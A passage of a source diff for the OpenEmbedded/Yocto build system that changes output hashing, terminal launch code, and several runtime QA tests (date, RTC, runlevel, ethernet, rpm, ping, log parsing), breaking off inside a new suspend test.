+        pkgarchs = ["${BUILD_ARCH}", "${BUILD_ARCH}_${ORIGNATIVELSBSTRING}"]
     elif taskdata.startswith("nativesdk-"):
         pkgarchs = ["${SDK_ARCH}_${SDK_OS}", "allarch"]
     elif "-cross-canadian" in taskdata:
@@ -477,9 +477,13 @@ def OEOuthashBasic(path, sigfile, task, d):
     h = hashlib.sha256()
     prev_dir = os.getcwd()
     include_owners = os.environ.get('PSEUDO_DISABLED') == '0'
+    if "package_write_" in task or task == "package_qa":
+        include_owners = False
     include_timestamps = False
+    include_root = True
     if task == "package":
         include_timestamps = d.getVar('BUILD_REPRODUCIBLE_BINARIES') == '1'
+        include_root = False
     extra_content = d.getVar('HASHEQUIV_HASH_VERSION')
 
     try:
@@ -550,9 +554,11 @@ def OEOuthashBasic(path, sigfile, task, d):
                     try:
                         update_hash(" %10s" % pwd.getpwuid(s.st_uid).pw_name)
                         update_hash(" %10s" % grp.getgrgid(s.st_gid).gr_name)
-                    except KeyError:
+                    except KeyError as e:
                         bb.warn("KeyError in %s" % path)
-                        raise
+                        msg = ("KeyError: %s\nPath %s is owned by uid %d, gid %d, which doesn't match "
+                            "any user/group on target. This may be due to host contamination." % (e, path, s.st_uid, s.st_gid))
+                        raise Exception(msg).with_traceback(e.__traceback__)
 
                 if include_timestamps:
                     update_hash(" %10d" % s.st_mtime)
@@ -588,7 +594,8 @@ def OEOuthashBasic(path, sigfile, task, d):
                 update_hash("\n")
 
             # Process this directory and all its child files
-            process(root)
+            if include_root or root != ".":
+                process(root)
             for f in files:
                 if f == 'fixmepath':
                     continue
diff --git a/meta/lib/oe/terminal.py b/meta/lib/oe/terminal.py
index eb10a6e33e..a0c166d884 100644
--- a/meta/lib/oe/terminal.py
+++ b/meta/lib/oe/terminal.py
@@ -102,6 +102,10 @@ class Rxvt(XTerminal):
     command = 'rxvt -T "{title}" -e {command}'
     priority = 1
 
+class URxvt(XTerminal):
+    command = 'urxvt -T "{title}" -e {command}'
+    priority = 1
+
 class Screen(Terminal):
     command = 'screen -D -m -t "{title}" -S devshell {command}'
 
@@ -163,7 +167,12 @@ class Tmux(Terminal):
         # devshells, if it's already there, add a new window to it.
         window_name = 'devshell-%i' % os.getpid()
 
-        self.command = 'tmux new -c "{{cwd}}" -d -s {0} -n {0} "{{command}}"'.format(window_name)
+        self.command = 'tmux new -c "{{cwd}}" -d -s {0} -n {0} "{{command}}"'
+        if not check_tmux_version('1.9'):
+            # `tmux new-session -c` was added in 1.9;
+            # older versions fail with that flag
+            self.command = 'tmux new -d -s {0} -n {0} "{{command}}"'
+        self.command = self.command.format(window_name)
         Terminal.__init__(self, sh_cmd, title, env, d)
 
         attach_cmd = 'tmux att -t {0}'.format(window_name)
@@ -253,13 +262,18 @@ def spawn(name, sh_cmd, title=None, env=None, d=None):
         except OSError:
            return
 
+def check_tmux_version(desired):
+    vernum = check_terminal_version("tmux")
+    if vernum and LooseVersion(vernum) < desired:
+        return False
+    return vernum
+
 def check_tmux_pane_size(tmux):
     import subprocess as sub
     # On older tmux versions (<1.9), return false. The reason
     # is that there is no easy way to get the height of the active panel
     # on current window without nested formats (available from version 1.9)
-    vernum = check_terminal_version("tmux")
-    if vernum and LooseVersion(vernum) < '1.9':
+    if not check_tmux_version('1.9'):
         return False
     try:
         p = sub.Popen('%s list-panes -F "#{?pane_active,#{pane_height},}"' % tmux,
diff --git a/meta/lib/oe/utils.py b/meta/lib/oe/utils.py
index 13f4271da0..3e016244c5 100644
--- a/meta/lib/oe/utils.py
+++ b/meta/lib/oe/utils.py
@@ -193,7 +193,7 @@ def parallel_make(d, makeinst=False):
 
         return int(v)
 
-    return None
+    return ''
 
 def parallel_make_argument(d, fmt, limit=None, makeinst=False):
     """
@@ -481,7 +481,8 @@ class ThreadedWorker(Thread):
             try:
                 func(self, *args, **kargs)
             except Exception as e:
-                print(e)
+                # Eat all exceptions
+                bb.mainlogger.debug("Worker task raised %s" % e, exc_info=e)
             finally:
                 self.tasks.task_done()
 
diff --git a/meta/lib/oeqa/core/case.py b/meta/lib/oeqa/core/case.py
index aae451fef2..bc4446a938 100644
--- a/meta/lib/oeqa/core/case.py
+++ b/meta/lib/oeqa/core/case.py
@@ -43,8 +43,13 @@ class OETestCase(unittest.TestCase):
         clss.tearDownClassMethod()
 
     def _oeSetUp(self):
-        for d in self.decorators:
-            d.setUpDecorator()
+        try:
+            for d in self.decorators:
+                d.setUpDecorator()
+        except:
+            for d in self.decorators:
+                d.tearDownDecorator()
+            raise
         self.setUpMethod()
 
     def _oeTearDown(self):
diff --git a/meta/lib/oeqa/core/decorator/oetimeout.py b/meta/lib/oeqa/core/decorator/oetimeout.py
index df90d1c798..5e6873ad48 100644
--- a/meta/lib/oeqa/core/decorator/oetimeout.py
+++ b/meta/lib/oeqa/core/decorator/oetimeout.py
@@ -24,5 +24,6 @@ class OETimeout(OETestDecorator):
 
     def tearDownDecorator(self):
         signal.alarm(0)
-        signal.signal(signal.SIGALRM, self.alarmSignal)
-        self.logger.debug("Removed SIGALRM handler")
+        if hasattr(self, 'alarmSignal'):
+            signal.signal(signal.SIGALRM, self.alarmSignal)
+            self.logger.debug("Removed SIGALRM handler")
diff --git a/meta/lib/oeqa/core/target/ssh.py b/meta/lib/oeqa/core/target/ssh.py
index aefb576805..832b6216f6 100644
--- a/meta/lib/oeqa/core/target/ssh.py
+++ b/meta/lib/oeqa/core/target/ssh.py
@@ -34,6 +34,7 @@ class OESSHTarget(OETarget):
         self.timeout = timeout
         self.user = user
         ssh_options = [
+                '-o', 'HostKeyAlgorithms=+ssh-rsa',
                 '-o', 'UserKnownHostsFile=/dev/null',
                 '-o', 'StrictHostKeyChecking=no',
                 '-o', 'LogLevel=ERROR'
@@ -225,6 +226,9 @@ def SSHCall(command, logger, timeout=None, **opts):
                             endtime = time.time() + timeout
                 except InterruptedError:
                     continue
+                except BlockingIOError:
+                    logger.debug('BlockingIOError')
+                    continue
 
             # process hasn't returned yet
             if not eof:
diff --git a/meta/lib/oeqa/core/tests/cases/timeout.py b/meta/lib/oeqa/core/tests/cases/timeout.py
index 5dfecc7b7c..69cf969a67 100644
--- a/meta/lib/oeqa/core/tests/cases/timeout.py
+++ b/meta/lib/oeqa/core/tests/cases/timeout.py
@@ -8,6 +8,7 @@ from time import sleep
 
 from oeqa.core.case import OETestCase
 from oeqa.core.decorator.oetimeout import OETimeout
+from oeqa.core.decorator.depends import OETestDepends
 
 class TimeoutTest(OETestCase):
 
@@ -19,3 +20,15 @@ class TimeoutTest(OETestCase):
     def testTimeoutFail(self):
         sleep(2)
         self.assertTrue(True, msg='How is this possible?')
+
+
+    def testTimeoutSkip(self):
+        self.skipTest("This test needs to be skipped, so that testTimeoutDepends()'s OETestDepends kicks in")
+
+    @OETestDepends(["timeout.TimeoutTest.testTimeoutSkip"])
+    @OETimeout(3)
+    def testTimeoutDepends(self):
+        self.assertTrue(False, msg='How is this possible?')
+
+    def testTimeoutUnrelated(self):
+        sleep(6)
diff --git a/meta/lib/oeqa/core/tests/test_decorators.py b/meta/lib/oeqa/core/tests/test_decorators.py
index b798bf7d33..5095f39948 100755
--- a/meta/lib/oeqa/core/tests/test_decorators.py
+++ b/meta/lib/oeqa/core/tests/test_decorators.py
@@ -133,5 +133,11 @@ class TestTimeoutDecorator(TestBase):
         msg = "OETestTimeout didn't restore SIGALRM"
         self.assertIs(alarm_signal, signal.getsignal(signal.SIGALRM), msg=msg)
 
+    def test_timeout_cancel(self):
+        tests = ['timeout.TimeoutTest.testTimeoutSkip', 'timeout.TimeoutTest.testTimeoutDepends', 'timeout.TimeoutTest.testTimeoutUnrelated']
+        msg = 'Unrelated test failed to complete'
+        tc = self._testLoader(modules=self.modules, tests=tests)
+        self.assertTrue(tc.runTests().wasSuccessful(), msg=msg)
+
 if __name__ == '__main__':
     unittest.main()
diff --git a/meta/lib/oeqa/manual/eclipse-plugin.json b/meta/lib/oeqa/manual/eclipse-plugin.json
index d77d0e673b..6c110d0656 100644
--- a/meta/lib/oeqa/manual/eclipse-plugin.json
+++ b/meta/lib/oeqa/manual/eclipse-plugin.json
@@ -44,7 +44,7 @@
                     "expected_results": ""
                 },
                 "2": {
-                    "action": "wget  autobuilder.yoctoproject.org/pub/releases//machines/qemu/qemux86/qemu (ex:core-image-sato-sdk-qemux86-date-rootfs-tar-bz2) \nsource /opt/poky/version/environment-setup-i585-poky-linux  \n\nExtract qemu with runqemu-extract-sdk /home/user/file(ex.core-image-sato-sdk-qemux86.bz2) \n/home/user/qemux86-sato-sdk  \n\n",
+                    "action": "wget  https://downloads.yoctoproject.org/releases/yocto/yocto-$VERSION/machines/qemu/qemux86/ (ex:core-image-sato-sdk-qemux86-date-rootfs-tar-bz2) \nsource /opt/poky/version/environment-setup-i585-poky-linux  \n\nExtract qemu with runqemu-extract-sdk /home/user/file(ex.core-image-sato-sdk-qemux86.bz2) \n/home/user/qemux86-sato-sdk  \n\n",
                     "expected_results": " Qemu can be lauched normally."
                 },
                 "3": {
@@ -60,7 +60,7 @@
                     "expected_results": ""
                 },
                 "6": {
-                    "action": "(d) QEMU: \nSelect this option if you will be using the QEMU emulator. Specify the Kernel matching the QEMU architecture you are using. \n      wget  autobuilder.yoctoproject.org/pub/releases//machines/qemu/qemux86/bzImage-qemux86.bin \n      e.g: /home/$USER/yocto/adt-installer/download_image/bzImage-qemux86.bin  \n\n",
+                    "action": "(d) QEMU: \nSelect this option if you will be using the QEMU emulator. Specify the Kernel matching the QEMU architecture you are using. \n      wget  https://downloads.yoctoproject.org/releases/yocto/yocto-$VERSION/machines/qemu/qemux86/bzImage-qemux86.bin \n      e.g: /home/$USER/yocto/adt-installer/download_image/bzImage-qemux86.bin  \n\n",
                     "expected_results": ""
                 },	
                 "7": {
@@ -247,7 +247,7 @@
             "execution": {
                 "1": {
                     "action": "Clone eclipse-poky source.   \n    \n    - git clone git://git.yoctoproject.org/eclipse-poky  \n\n",
-                    "expected_results": "Eclipse plugin is successfully installed  \n\nDocumentation is there. For example if you have release yocto-2.0.1 you will found on   http://autobuilder.yoctoproject.org/pub/releases/yocto-2.0.1/eclipse-plugin/mars/  archive with documentation like org.yocto.doc-development-$date.zip  \n  \n"
+                    "expected_results": "Eclipse plugin is successfully installed  \n\nDocumentation is there. For example if you have release yocto-2.0.1 you will found on   https://downloads.yoctoproject.org/releases/yocto/yocto-2.0.1/eclipse-plugin/mars/  archive with documentation like org.yocto.doc-development-$date.zip  \n  \n"
                 },
                 "2": {
                     "action": "Checkout correct tag.  \n\n    - git checkout <eclipse-version>/<yocto-version> \n\n",
diff --git a/meta/lib/oeqa/manual/oe-core.json b/meta/lib/oeqa/manual/oe-core.json
index fb47c5ec36..4ad524d89b 100644
--- a/meta/lib/oeqa/manual/oe-core.json
+++ b/meta/lib/oeqa/manual/oe-core.json
@@ -80,7 +80,7 @@
           "expected_results": ""
         },
         "7": {
-          "action": "Run command:./configure && make ",
+          "action": "Run command:./configure ${CONFIGUREOPTS} && make ",
           "expected_results": "Verify that \"matchbox-desktop\" binary file was created successfully under \"src/\" directory "
         },
         "8": {
diff --git a/meta/lib/oeqa/manual/toaster-managed-mode.json b/meta/lib/oeqa/manual/toaster-managed-mode.json
index 12374c7c64..9566d9d10e 100644
--- a/meta/lib/oeqa/manual/toaster-managed-mode.json
+++ b/meta/lib/oeqa/manual/toaster-managed-mode.json
@@ -136,7 +136,7 @@
           "expected_results": ""
         },
         "3": {
-          "action": "Check that default values are as follows: \n\tDISTRO - poky \n\tIMAGE_FSTYPES - ext3 jffs2 tar.bz2 \n\tIMAGE_INSTALL_append - \"Not set\" \n\tPACKAGE_CLASES - package_rpm \n        SSTATE_DIR  - /homeDirectory/poky/sstate-cache \n\n",
+          "action": "Check that default values are as follows: \n\tDISTRO - poky \n\tIMAGE_FSTYPES - ext3 jffs2 tar.bz2 \n\tIMAGE_INSTALL_append - \"Not set\" \n\tPACKAGE_CLASSES - package_rpm \n        SSTATE_DIR  - /homeDirectory/poky/sstate-cache \n\n",
           "expected_results": ""
         },
         "4": {
diff --git a/meta/lib/oeqa/runtime/cases/date.py b/meta/lib/oeqa/runtime/cases/date.py
index fdd2a6ae58..bd6537400e 100644
--- a/meta/lib/oeqa/runtime/cases/date.py
+++ b/meta/lib/oeqa/runtime/cases/date.py
@@ -13,12 +13,12 @@ class DateTest(OERuntimeTestCase):
     def setUp(self):
         if self.tc.td.get('VIRTUAL-RUNTIME_init_manager') == 'systemd':
             self.logger.debug('Stopping systemd-timesyncd daemon')
-            self.target.run('systemctl disable --now systemd-timesyncd')
+            self.target.run('systemctl disable --now --runtime systemd-timesyncd')
 
     def tearDown(self):
         if self.tc.td.get('VIRTUAL-RUNTIME_init_manager') == 'systemd':
             self.logger.debug('Starting systemd-timesyncd daemon')
-            self.target.run('systemctl enable --now systemd-timesyncd')
+            self.target.run('systemctl enable --now --runtime systemd-timesyncd')
 
     @OETestDepends(['ssh.SSHTest.test_ssh'])
     @OEHasPackage(['coreutils', 'busybox'])
@@ -28,14 +28,13 @@ class DateTest(OERuntimeTestCase):
         self.assertEqual(status, 0, msg=msg)
         oldDate = output
 
-        sampleDate = '"2016-08-09 10:00:00"'
-        (status, output) = self.target.run("date -s %s" % sampleDate)
+        sampleTimestamp = 1488800000
+        (status, output) = self.target.run("date -s @%d" % sampleTimestamp)
         self.assertEqual(status, 0, msg='Date set failed, output: %s' % output)
 
-        (status, output) = self.target.run("date -R")
-        p = re.match('Tue, 09 Aug 2016 10:00:.. \+0000', output)
+        (status, output) = self.target.run('date +"%s"')
         msg = 'The date was not set correctly, output: %s' % output
-        self.assertTrue(p, msg=msg)
+        self.assertTrue(int(output) - sampleTimestamp < 300, msg=msg)
 
         (status, output) = self.target.run('date -s "%s"' % oldDate)
         msg = 'Failed to reset date, output: %s' % output
diff --git a/meta/lib/oeqa/runtime/cases/df.py b/meta/lib/oeqa/runtime/cases/df.py
index 89fd0fb901..bb155c9cf9 100644
--- a/meta/lib/oeqa/runtime/cases/df.py
+++ b/meta/lib/oeqa/runtime/cases/df.py
@@ -4,12 +4,14 @@
 
 from oeqa.runtime.case import OERuntimeTestCase
 from oeqa.core.decorator.depends import OETestDepends
+from oeqa.core.decorator.data import skipIfDataVar, skipIfInDataVar
 from oeqa.runtime.decorator.package import OEHasPackage
 
 class DfTest(OERuntimeTestCase):
 
     @OETestDepends(['ssh.SSHTest.test_ssh'])
     @OEHasPackage(['coreutils', 'busybox'])
+    @skipIfInDataVar('IMAGE_FEATURES', 'read-only-rootfs', 'Test case df requires a writable rootfs')
     def test_df(self):
         cmd = "df -P / | sed -n '2p' | awk '{print $4}'"
         (status,output) = self.target.run(cmd)
diff --git a/meta/lib/oeqa/runtime/cases/ethernet_ip_connman.py b/meta/lib/oeqa/runtime/cases/ethernet_ip_connman.py
new file mode 100644
index 0000000000..e010612838
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/ethernet_ip_connman.py
@@ -0,0 +1,36 @@
+from oeqa.runtime.case import OERuntimeTestCase
+from oeqa.core.decorator.depends import OETestDepends
+from oeqa.core.decorator.data import skipIfQemu
+
+class Ethernet_Test(OERuntimeTestCase):
+
+    def set_ip(self, x): 
+        x = x.split(".")
+        sample_host_address = '150'        
+        x[3] = sample_host_address
+        x = '.'.join(x)
+        return x
+    
+    @skipIfQemu('qemuall', 'Test only runs on real hardware')    
+    @OETestDepends(['ssh.SSHTest.test_ssh'])
+    def test_set_virtual_ip(self):
+        (status, output) = self.target.run("ifconfig eth0 | grep 'inet ' | awk '{print $2}'")
+        self.assertEqual(status, 0, msg='Failed to get ip address. Make sure you have an ethernet connection on your device, output: %s' % output)
+        original_ip = output 
+        virtual_ip = self.set_ip(original_ip)
+        
+        (status, output) = self.target.run("ifconfig eth0:1 %s netmask 255.255.255.0 && sleep 2 && ping -c 5 %s && ifconfig eth0:1 down" % (virtual_ip,virtual_ip))
+        self.assertEqual(status, 0, msg='Failed to create virtual ip address, output: %s' % output)
+        
+    @OETestDepends(['ethernet_ip_connman.Ethernet_Test.test_set_virtual_ip'])  
+    def test_get_ip_from_dhcp(self): 
+        (status, output) = self.target.run("connmanctl services | grep -E '*AO Wired|*AR Wired' | awk '{print $3}'")
+        self.assertEqual(status, 0, msg='No wired interfaces are detected, output: %s' % output)
+        wired_interfaces = output
+        
+        (status, output) = self.target.run("ip route | grep default | awk '{print $3}'")
+        self.assertEqual(status, 0, msg='Failed to retrieve the default gateway, output: %s' % output)
+        default_gateway = output
+
+        (status, output) = self.target.run("connmanctl config %s --ipv4 dhcp && sleep 2 && ping -c 5 %s" % (wired_interfaces,default_gateway))
+        self.assertEqual(status, 0, msg='Failed to get dynamic IP address via DHCP in connmand, output: %s' % output)
\ No newline at end of file
diff --git a/meta/lib/oeqa/runtime/cases/ksample.py b/meta/lib/oeqa/runtime/cases/ksample.py
index a9a1620ebd..9883aa9aa8 100644
--- a/meta/lib/oeqa/runtime/cases/ksample.py
+++ b/meta/lib/oeqa/runtime/cases/ksample.py
@@ -10,7 +10,7 @@ from oeqa.core.decorator.depends import OETestDepends
 from oeqa.core.decorator.data import skipIfNotFeature
 
 # need some kernel fragments
-# echo "KERNEL_FEATURES_append += \" features\/kernel\-sample\/kernel\-sample.scc\"" >> local.conf
+# echo "KERNEL_FEATURES_append = \" features\/kernel\-sample\/kernel\-sample.scc\"" >> local.conf
 class KSample(OERuntimeTestCase):
     def cmd_and_check(self, cmd='', match_string=''):
         status, output = self.target.run(cmd)
diff --git a/meta/lib/oeqa/runtime/cases/ltp.py b/meta/lib/oeqa/runtime/cases/ltp.py
index a66d5d13d7..879f2a673c 100644
--- a/meta/lib/oeqa/runtime/cases/ltp.py
+++ b/meta/lib/oeqa/runtime/cases/ltp.py
@@ -67,7 +67,7 @@ class LtpTest(LtpTestBase):
     def runltp(self, ltp_group):
             cmd = '/opt/ltp/runltp -f %s -p -q -r /opt/ltp -l /opt/ltp/results/%s -I 1 -d /opt/ltp' % (ltp_group, ltp_group)
             starttime = time.time()
-            (status, output) = self.target.run(cmd)
+            (status, output) = self.target.run(cmd, timeout=1200)
             endtime = time.time()
 
             with open(os.path.join(self.ltptest_log_dir, "%s-raw.log" % ltp_group), 'w') as f:
diff --git a/meta/lib/oeqa/runtime/cases/pam.py b/meta/lib/oeqa/runtime/cases/pam.py
index 271a1943e3..a482ded945 100644
--- a/meta/lib/oeqa/runtime/cases/pam.py
+++ b/meta/lib/oeqa/runtime/cases/pam.py
@@ -8,11 +8,14 @@
 from oeqa.runtime.case import OERuntimeTestCase
 from oeqa.core.decorator.depends import OETestDepends
 from oeqa.core.decorator.data import skipIfNotFeature
+from oeqa.runtime.decorator.package import OEHasPackage
 
 class PamBasicTest(OERuntimeTestCase):
 
     @skipIfNotFeature('pam', 'Test requires pam to be in DISTRO_FEATURES')
     @OETestDepends(['ssh.SSHTest.test_ssh'])
+    @OEHasPackage(['shadow'])
+    @OEHasPackage(['shadow-base'])
     def test_pam(self):
         status, output = self.target.run('login --help')
         msg = ('login command does not work as expected. '
diff --git a/meta/lib/oeqa/runtime/cases/parselogs.py b/meta/lib/oeqa/runtime/cases/parselogs.py
index a1791b5cca..1cac59725d 100644
--- a/meta/lib/oeqa/runtime/cases/parselogs.py
+++ b/meta/lib/oeqa/runtime/cases/parselogs.py
@@ -32,7 +32,7 @@ common_errors = [
     "Failed to load module \"fbdev\"",
     "Failed to load module fbdev",
     "Failed to load module glx",
-    "[drm] Cannot find any crtc or sizes - going 1024x768",
+    "[drm] Cannot find any crtc or sizes",
     "_OSC failed (AE_NOT_FOUND); disabling ASPM",
     "Open ACPI failed (/var/run/acpid.socket) (No such file or directory)",
     "NX (Execute Disable) protection cannot be enabled: non-PAE kernel!",
@@ -61,6 +61,8 @@ common_errors = [
     "[rdrand]: Initialization Failed",
     "[pulseaudio] authkey.c: Failed to open cookie file",
     "[pulseaudio] authkey.c: Failed to load authentication key",
+    "was skipped because of a failed condition check",
+    "was skipped because all trigger condition checks failed",
     ]
 
 video_related = [
@@ -88,6 +90,9 @@ qemux86_common = [
     'tsc: HPET/PMTIMER calibration failed',
     "modeset(0): Failed to initialize the DRI2 extension",
     "glamor initialization failed",
+    "blk_update_request: I/O error, dev fd0, sector 0 op 0x0:(READ)",
+    "floppy: error",
+    'failed to IDENTIFY (I/O error, err_mask=0x4)',
 ] + common_errors
 
 ignore_errors = {
@@ -293,7 +298,7 @@ class ParseLogsTest(OERuntimeTestCase):
         grepcmd = 'grep '
         grepcmd += '-Ei "'
         for error in errors:
-            grepcmd += '\<' + error + '\>' + '|'
+            grepcmd += r'\<' + error + r'\>' + '|'
         grepcmd = grepcmd[:-1]
         grepcmd += '" ' + str(log) + " | grep -Eiv \'"
 
@@ -304,13 +309,13 @@ class ParseLogsTest(OERuntimeTestCase):
             errorlist = ignore_errors['default']
 
         for ignore_error in errorlist:
-            ignore_error = ignore_error.replace('(', '\(')
-            ignore_error = ignore_error.replace(')', '\)')
+            ignore_error = ignore_error.replace('(', r'\(')
+            ignore_error = ignore_error.replace(')', r'\)')
             ignore_error = ignore_error.replace("'", '.')
-            ignore_error = ignore_error.replace('?', '\?')
-            ignore_error = ignore_error.replace('[', '\[')
-            ignore_error = ignore_error.replace(']', '\]')
-            ignore_error = ignore_error.replace('*', '\*')
+            ignore_error = ignore_error.replace('?', r'\?')
+            ignore_error = ignore_error.replace('[', r'\[')
+            ignore_error = ignore_error.replace(']', r'\]')
+            ignore_error = ignore_error.replace('*', r'\*')
             ignore_error = ignore_error.replace('0-9', '[0-9]')
             grepcmd += ignore_error + '|'
         grepcmd = grepcmd[:-1]
diff --git a/meta/lib/oeqa/runtime/cases/ping.py b/meta/lib/oeqa/runtime/cases/ping.py
index f6603f75ec..498f80d0a5 100644
--- a/meta/lib/oeqa/runtime/cases/ping.py
+++ b/meta/lib/oeqa/runtime/cases/ping.py
@@ -6,6 +6,7 @@ from subprocess import Popen, PIPE
 
 from oeqa.runtime.case import OERuntimeTestCase
 from oeqa.core.decorator.oetimeout import OETimeout
+from oeqa.core.exception import OEQATimeoutError
 
 class PingTest(OERuntimeTestCase):
 
@@ -13,14 +14,17 @@ class PingTest(OERuntimeTestCase):
     def test_ping(self):
         output = ''
         count = 0
-        while count < 5:
-            cmd = 'ping -c 1 %s' % self.target.ip
-            proc = Popen(cmd, shell=True, stdout=PIPE)
-            output += proc.communicate()[0].decode('utf-8')
-            if proc.poll() == 0:
-                count += 1
-            else:
-                count = 0
+        try:
+            while count < 5:
+                cmd = 'ping -c 1 %s' % self.target.ip
+                proc = Popen(cmd, shell=True, stdout=PIPE)
+                output += proc.communicate()[0].decode('utf-8')
+                if proc.poll() == 0:
+                    count += 1
+                else:
+                    count = 0
+        except OEQATimeoutError:
+            self.fail("Ping timeout error for address %s, count %s, output: %s" % (self.target.ip, count, output))
         msg = ('Expected 5 consecutive, got %d.\n'
                'ping output is:\n%s' % (count,output))
         self.assertEqual(count, 5, msg = msg)
diff --git a/meta/lib/oeqa/runtime/cases/ptest.py b/meta/lib/oeqa/runtime/cases/ptest.py
index ef0470da7e..2066d009c3 100644
--- a/meta/lib/oeqa/runtime/cases/ptest.py
+++ b/meta/lib/oeqa/runtime/cases/ptest.py
@@ -104,4 +104,5 @@ class PtestRunnerTest(OERuntimeTestCase):
             failmsg = failmsg + "Failed ptests:\n%s" % pprint.pformat(failed_tests)
 
         if failmsg:
+            self.logger.warning("There were failing ptests.")
             self.fail(failmsg)
diff --git a/meta/lib/oeqa/runtime/cases/rpm.py b/meta/lib/oeqa/runtime/cases/rpm.py
index 8e18b426f8..203fcc8505 100644
--- a/meta/lib/oeqa/runtime/cases/rpm.py
+++ b/meta/lib/oeqa/runtime/cases/rpm.py
@@ -49,21 +49,20 @@ class RpmBasicTest(OERuntimeTestCase):
             msg = 'status: %s. Cannot run rpm -qa: %s' % (status, output)
             self.assertEqual(status, 0, msg=msg)
 
-        def check_no_process_for_user(u):
-            _, output = self.target.run(self.tc.target_cmds['ps'])
-            if u + ' ' in output:
-                return False
-            else:
-                return True
+        def wait_for_no_process_for_user(u, timeout = 120):
+            timeout_at = time.time() + timeout
+            while time.time() < timeout_at:
+                _, output = self.target.run(self.tc.target_cmds['ps'])
+                if u + ' ' not in output:
+                    return
+                time.sleep(1)
+            user_pss = [ps for ps in output.split("\n") if u + ' ' in ps]
+            msg = "User %s has processes still running: %s" % (u, "\n".join(user_pss))
+            self.fail(msg=msg)
 
         def unset_up_test_user(u):
             # ensure no test1 process in running
-            timeout = time.time() + 30
-            while time.time() < timeout:
-                if check_no_process_for_user(u):
-                    break
-                else:
-                    time.sleep(1)
+            wait_for_no_process_for_user(u)
             status, output = self.target.run('userdel -r %s' % u)
             msg = 'Failed to erase user: %s' % output
             self.assertTrue(status == 0, msg=msg)
@@ -141,13 +140,4 @@ class RpmInstallRemoveTest(OERuntimeTestCase):
 
         self.tc.target.run('rm -f %s' % self.dst)
 
-        # if using systemd this should ensure all entries are flushed to /var
-        status, output = self.target.run("journalctl --sync")
-        # Get the amount of entries in the log file
-        status, output = self.target.run(check_log_cmd)
-        msg = 'Failed to get the final size of the log file.'
-        self.assertEqual(0, status, msg=msg)
 
-        # Check that there's enough of them
-        self.assertGreaterEqual(int(output), 80,
-                                   'Cound not find sufficient amount of rpm entries in /var/log/messages, found {} entries'.format(output))
diff --git a/meta/lib/oeqa/runtime/cases/rtc.py b/meta/lib/oeqa/runtime/cases/rtc.py
new file mode 100644
index 0000000000..39f4d29f23
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/rtc.py
@@ -0,0 +1,40 @@
+from oeqa.runtime.case import OERuntimeTestCase
+from oeqa.core.decorator.depends import OETestDepends
+from oeqa.core.decorator.data import skipIfFeature
+from oeqa.runtime.decorator.package import OEHasPackage
+
+import re
+
+class RTCTest(OERuntimeTestCase):
+
+    def setUp(self):
+        if self.tc.td.get('VIRTUAL-RUNTIME_init_manager') == 'systemd':
+            self.logger.debug('Stopping systemd-timesyncd daemon')
+            self.target.run('systemctl disable --now --runtime systemd-timesyncd')
+
+    def tearDown(self):
+        if self.tc.td.get('VIRTUAL-RUNTIME_init_manager') == 'systemd':
+            self.logger.debug('Starting systemd-timesyncd daemon')
+            self.target.run('systemctl enable --now --runtime systemd-timesyncd')
+
+    @skipIfFeature('read-only-rootfs',
+                   'Test does not work with read-only-rootfs in IMAGE_FEATURES')
+    @OETestDepends(['ssh.SSHTest.test_ssh'])
+    @OEHasPackage(['coreutils', 'busybox'])
+    def test_rtc(self):
+        (status, output) = self.target.run('hwclock -r')
+        self.assertEqual(status, 0, msg='Failed to get RTC time, output: %s' % output)
+
+        (status, current_datetime) = self.target.run('date +"%m%d%H%M%Y"')
+        self.assertEqual(status, 0, msg='Failed to get system current date & time, output: %s' % current_datetime)
+
+        example_datetime = '062309452008'
+        (status, output) = self.target.run('date %s ; hwclock -w ; hwclock -r' % example_datetime)
+        check_hwclock = re.search('2008-06-23 09:45:..', output)
+        self.assertTrue(check_hwclock, msg='The RTC time was not set correctly, output: %s' % output)
+
+        (status, output) = self.target.run('date %s' % current_datetime)
+        self.assertEqual(status, 0, msg='Failed to reset system date & time, output: %s' % output)
+
+        (status, output) = self.target.run('hwclock -w')
+        self.assertEqual(status, 0, msg='Failed to reset RTC time, output: %s' % output)
diff --git a/meta/lib/oeqa/runtime/cases/runlevel.py b/meta/lib/oeqa/runtime/cases/runlevel.py
new file mode 100644
index 0000000000..3a4df8ace1
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/runlevel.py
@@ -0,0 +1,22 @@
+from oeqa.runtime.case import OERuntimeTestCase
+from oeqa.core.decorator.depends import OETestDepends
+
+import time
+
+class RunLevel_Test(OERuntimeTestCase):
+    
+    @OETestDepends(['ssh.SSHTest.test_ssh'])
+    def test_runlevel_3(self):
+        (status, output) = self.target.run("init 3 && sleep 5 && runlevel")
+        runlevel= '5 3'
+        self.assertEqual(output, runlevel, msg='Failed to set current runlevel to runlevel 3, current runlevel : %s' % output[-1])
+        (status, output) = self.target.run("uname -a")
+        self.assertEqual(status, 0, msg='Failed to run uname command, output: %s' % output)
+        
+    @OETestDepends(['runlevel.RunLevel_Test.test_runlevel_3']) 
+    def test_runlevel_5(self):
+        (status, output) = self.target.run("init 5 && sleep 5 && runlevel")
+        runlevel = '3 5'
+        self.assertEqual(output, runlevel, msg='Failed to set current runlevel to runlevel 5, current runlevel : %s' % output[-1])
+        (status, output) = self.target.run('export DISPLAY=:0 && x11perf -aa10text')
+        self.assertEqual(status, 0, msg='Failed to run 2D graphic test, output: %s' % output)
diff --git a/meta/lib/oeqa/runtime/cases/scp.py b/meta/lib/oeqa/runtime/cases/scp.py
index 3a5f292152..f2bbc947d6 100644
--- a/meta/lib/oeqa/runtime/cases/scp.py
+++ b/meta/lib/oeqa/runtime/cases/scp.py
@@ -23,7 +23,7 @@ class ScpTest(OERuntimeTestCase):
         os.remove(cls.tmp_path)
 
     @OETestDepends(['ssh.SSHTest.test_ssh'])
-    @OEHasPackage(['openssh-scp', 'dropbear'])
+    @OEHasPackage(['openssh-scp'])
     def test_scp_file(self):
         dst = '/tmp/test_scp_file'
 
diff --git a/meta/lib/oeqa/runtime/cases/suspend.py b/meta/lib/oeqa/runtime/cases/suspend.py
new file mode 100644
index 0000000000..67b6f7e56f
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/suspend.py
@@ -0,0 +1,33 @@
+from oeqa.runtime.case import OERuntimeTestCase
+from oeqa.core.decorator.depends import OETestDepends
+from oeqa.core.decorator.data import skipIfQemu
+import threading
+import time
+
+class Suspend_Test(OERuntimeTestCase):
+
+    def test_date(self): 
+        (status, output) = self.target.run('date')
